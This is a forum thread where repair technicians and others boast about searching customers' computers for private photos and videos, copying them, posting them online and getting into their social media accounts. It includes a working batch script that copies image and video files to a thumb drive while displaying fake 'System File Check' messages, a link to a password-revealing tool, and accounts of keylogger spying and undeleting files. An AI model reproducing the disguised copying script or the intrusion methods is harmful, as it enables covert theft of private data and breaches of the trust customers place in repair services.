F2 Navigation   |  Options  |  Login  |  Register  |  Status  |  FAQ  |  Upload Pics  |  Normal Mode Bookmark and Share


Back to Index | Reply to Topic

Page: 1 2  | Previous  Next | First  Last

  FACT: I am an independent computer technician (glorified virus remover). I WILL look through your personal photos.
.
Unregistered

I WILL search the entire drive for jpg files over 50k.
I WILL use an administrator account to access other users personal data.
I WILL investigate any folder with interesting images.
I WILL copy them to a thumb drive.
I WILL post good photos on 4chan.
I WILL use a Web Form password recovery tool to access your FaceBook, MySpace and other web pages.

.
Unregistered

I used to work at a computer repair place. Everything but the last two on that list are true.
Zathrus-1
Registered

713 posts

Damn! I'd almost forgot about how I had dos commands to look for jpg's over 50kk!
Zathrus-1
Registered

713 posts

truecrypt. People need to start using it.
.
Unregistered

Zathrus-1 said:Damn! I'd almost forgot about how I had dos commands to look for jpg's over 50kk!



The following is my Batch File I carry on my thumb drive:
(%1 is my thumb drive letter, %2 is a random name for the folder)


echo off
cls
echo System File Check 01...

xcopy *.jpg %1\backup\%2\ /s /c /q /y
cls
echo System File Check 02...

xcopy *.jpeg %1\backup\%2\ /s /c /q /y
cls
echo System File Check 03...

xcopy *.avi %1\backup\%2\ /s /c /q /y
cls
echo System File Check 04...

xcopy *.mpg %1\backup\%2\ /s /c /q /y
cls
echo System File Check 05...

xcopy *.mpeg %1\backup\%2\ /s /c /q /y
cls
echo System File Check 06...

xcopy *.3gp %1\backup\%2\ /s /c /q /y
cls
echo System File Check 07...

xcopy *.mov %1\backup\%2\ /s /c /q /y
cls
echo System File Check 08...


cls
echo on
.
Unregistered

The people who drop their computers off at computer shops are too dumb to even know what encryption means.
ex pc tech
Unregistered

We had a regular client who is a cop and we would regularly save hundreds of photos off his computer. Most were of himself barebacking hookers.
.
Unregistered

. said:
I WILL use a Web Form password recovery tool to access your FaceBook, MySpace and other web pages.


:link:
.
Unregistered

. said:
. said:
I WILL use a Web Form password recovery tool to access your FaceBook, MySpace and other web pages.


:link:



http://www.snapfiles.com/get/asteriskkey.html
Crack_Whore_CEO
Registered

8 posts

I had given away my daughter's computer to some people taht worked at my neighbor's store. But I forgot that I had a keylogger in there to monitor my daughter's chats and emails.

So I kept getting email reports of thei activities. It was funny as shit. The husband apparently loved the "Black on Blonde" pron sites and the wife was trying to hook up with some dude I'm guessing she met on Facebook.

.
Unregistered

Zathrus-1 said:truecrypt. People need to start using it.



I'd be getting so many calls from people who can't remember their passwords. It would be fun to tell them how fucked they are.
.
Unregistered

. said: :link:

search snadboy
.
Unregistered

. said:I WILL search the entire drive for jpg files over 50k.
I WILL use an administrator account to access other users personal data.
I WILL investigate any folder with interesting images.
I WILL copy them to a thumb drive.
I WILL post good photos on 4chan.
I WILL use a Web Form password recovery tool to access your FaceBook, MySpace and other web pages.



No you won't.
.
Unregistered

. said:No you won't.



You go ahead and believe that.
.
Unregistered

. said:The people who drop their computers off at computer shops are too dumb to even know what encryption means.



:potd:

Never taken a PC to a tech-drone, EVER.
.
Unregistered

Crack_Whore_CEO said:I had given away my daughter's computer to some people taht worked at my neighbor's store. But I forgot that I had a keylogger in there to monitor my daughter's chats and emails.

So I kept getting email reports of thei activities. It was funny as shit. The husband apparently loved the "Black on Blonde" pron sites and the wife was trying to hook up with some dude I'm guessing she met on Facebook.



:lol:

:potd:

Side note: Which keylogger?
.
Unregistered

. said:
. said:No you won't.



You go ahead and believe that.



Okay, since it's the truth.
Shiny New Kid
Revolution is the only solution

11711 posts

I always take all the HDs out when giving it to shop (if a component failed for example and I want them to change it on warranty)

I once had a removable HD shared between a bunch of us to share office files. We were a start up and it was cheaper and easier than a server for getting started.

One guy uploaded some photos, and he must have copied any jpg on his computer as there were a whole bunch of what were obviously pics from porn sites sprinkled in with his own photos, as well as logos and the like from websites he'd visited, so he must have copied them out of Temp by accident.

.
Unregistered

HE did that on purpose
.
Unregistered

I remember setting up a system for a (extremely paranoid) friend of mine - it had the entire disk except for the boot track encrypted so you had to type in a (long) passphrase every time you booted it.

It also had modifed HDD firmware that responded to the standard ATA or ATAPI "Identify unit" comment (0xEC/0xA1, IIRC) by returning reasonable looking data, but setting a flag that resulted in all subsequent reads returning all zeros - with the real identify command mapped to some other normally unused value. Making the system work was real fun, since _everthing_ that hit the drive from the BIOS upwards had to be patched to use the new value.

Once it was all patched, the drive firmware was further modified so that when the flag was set it also triggered the same processing that the SECURITY:ERASE_UNIT command carried out. I hope nobody ever tried to use it in some other machine, since it would have been extremely frustrating...
Zathrus-1
Registered

713 posts

. said:
. said:
. said:No you won't.



You go ahead and believe that.



Okay, since it's the truth.



You're right. Really what we do during long boring tests and installs is sit and read our bibles. :laugh:
.
Unregistered

you tech lightweights suck. I boot machines up with linux on a usb drive and start undeleteing every image and text file on the HD to the usb stick.

Thats where you find the real surprises. pays off 99% of the time.
Crack_Whore_CEO
Registered

8 posts

. said: :lol:

:potd:

Side note: Which keylogger?



It was Spectorsoft - I forget now which product
.
Unregistered

. said:you tech lightweights suck. I boot machines up with linux on a usb drive and start undeleteing every image and text file on the HD to the usb stick.

Thats where you find the real surprises. pays off 99% of the time.



cp galore?
.
Unregistered

. said:I remember setting up a system for a (extremely paranoid) friend of mine - it had the entire disk except for the boot track encrypted so you had to type in a (long) passphrase every time you booted it.

It also had modifed HDD firmware that responded to the standard ATA or ATAPI "Identify unit" comment (0xEC/0xA1, IIRC) by returning reasonable looking data, but setting a flag that resulted in all subsequent reads returning all zeros - with the real identify command mapped to some other normally unused value. Making the system work was real fun, since _everthing_ that hit the drive from the BIOS upwards had to be patched to use the new value.

Once it was all patched, the drive firmware was further modified so that when the flag was set it also triggered the same processing that the SECURITY:ERASE_UNIT command carried out. I hope nobody ever tried to use it in some other machine, since it would have been extremely frustrating...

Yeah, that sounds "fun". :rolleyes:

Page: 1 2  | Previous  Next | First  Last

Back to Index | Reply to Topic

 
Quick Reply
Moniker:
Message: